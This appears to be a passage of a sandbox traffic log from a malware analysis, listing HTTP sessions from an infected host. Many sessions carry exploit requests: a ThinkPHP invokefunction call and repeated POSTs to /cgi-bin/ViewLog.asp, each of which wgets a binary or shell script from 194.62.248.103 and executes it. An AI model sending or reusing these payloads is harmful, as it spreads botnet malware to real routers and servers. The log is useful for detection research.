                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 38 66 30 31 30 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 33 34 32 26 23 34 36 3b 32 66 61 36 66 65 64 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 31 38 66 30 31 30 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 33 34 32 26 23 34 36 3b 32 66 61 36 66 65 64 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;18f01002&#46;1713105342&#46;2fa6fed<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;18f01002&#46;1713105342&#46;2fa6fed</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        283192.168.2.234710495.100.190.6080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:42.150221109 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:42.462193966 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:35:42 GMT
                                                        Date: Sun, 14 Apr 2024 14:35:42 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 66 32 64 31 66 35 35 37 26 23 34 36 3b 31 37 31 33 31 30 35 33 34 32 26 23 34 36 3b 31 34 37 34 61 35 31 62 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 66 32 64 31 66 35 35 37 26 23 34 36 3b 31 37 31 33 31 30 35 33 34 32 26 23 34 36 3b 31 34 37 34 61 35 31 62 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;f2d1f557&#46;1713105342&#46;1474a51b<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;f2d1f557&#46;1713105342&#46;1474a51b</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        284192.168.2.234730295.216.8.5880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:42.159840107 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:42.480474949 CEST1289INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:35:42 GMT
                                                        Server: Apache
                                                        Accept-Ranges: bytes
                                                        Vary: Accept-Encoding
                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: 0
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20
                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; }
                                                        Apr 14, 2024 16:35:42.480509996 CEST1289INData Raw: 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20
                                                        Data Ascii: .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat;
                                                        Apr 14, 2024 16:35:42.480561018 CEST1289INData Raw: 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20
                                                        Data Ascii: .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer {
                                                        Apr 14, 2024 16:35:42.480573893 CEST1289INData Raw: 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78
                                                        Data Ascii: t; } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0;
                                                        Apr 14, 2024 16:35:42.480588913 CEST1289INData Raw: 2f 33 48 6e 79 43 37 74 31 35 6f 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54
                                                        Data Ascii: /3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl
                                                        Apr 14, 2024 16:35:42.480600119 CEST1289INData Raw: 6a 6d 42 41 65 32 62 39 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36
                                                        Data Ascii: jmBAe2b95U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQ
                                                        Apr 14, 2024 16:35:42.480613947 CEST1101INData Raw: 41 61 79 49 53 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30 4f 67 7a 49 6c 72 61 52 38 76 6b 77 36 71 6e 58 6d 75 44 53 46
                                                        Data Ascii: AayISLWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X
                                                        Apr 14, 2024 16:35:42.480734110 CEST1289INData Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20
                                                        Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to setubal1.redecpanel.com's <a href="mailto:jorgebru
                                                        Apr 14, 2024 16:35:42.480746031 CEST351INData Raw: 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61 6e 65 6c 22 20 74 69 74 6c 65 3d 22 63 50 61 6e 65 6c 2c 20 49 6e 63 2e
                                                        Data Ascii: utm_content=logolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyright">Copyright 2016 c


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        285192.168.2.234133494.112.113.1338080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:42.538937092 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        286192.168.2.233320694.121.192.2298080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:42.554785013 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        287192.168.2.233509662.29.102.88080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:42.557861090 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        288192.168.2.235082231.200.112.1648080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:42.558675051 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        289192.168.2.233673494.123.82.1318080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:42.559437990 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        290192.168.2.234578631.200.109.1308080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:42.563395023 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        291192.168.2.235991885.235.148.1528080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:44.235084057 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:44.551513910 CEST318INHTTP/1.1 200 OK
                                                        Server: gunicorn
                                                        Date: Sun, 14 Apr 2024 14:35:44 GMT
                                                        Connection: keep-alive
                                                        x-frame-options: SAMEORIGIN
                                                        x-content-type-options: nosniff
                                                        x-xss-protection: 1; mode=block
                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                        content-type: text/html
                                                        content-length: 110397


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        292192.168.2.233420685.215.250.1038080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:44.236301899 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:44.548280001 CEST498INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:35:44 GMT
                                                        Server: Apache/2.4.52 (Ubuntu)
                                                        Content-Length: 304
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at 192.168.0.14 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        293192.168.2.235888431.136.180.258080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:44.243292093 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:45.247407913 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:47.231049061 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
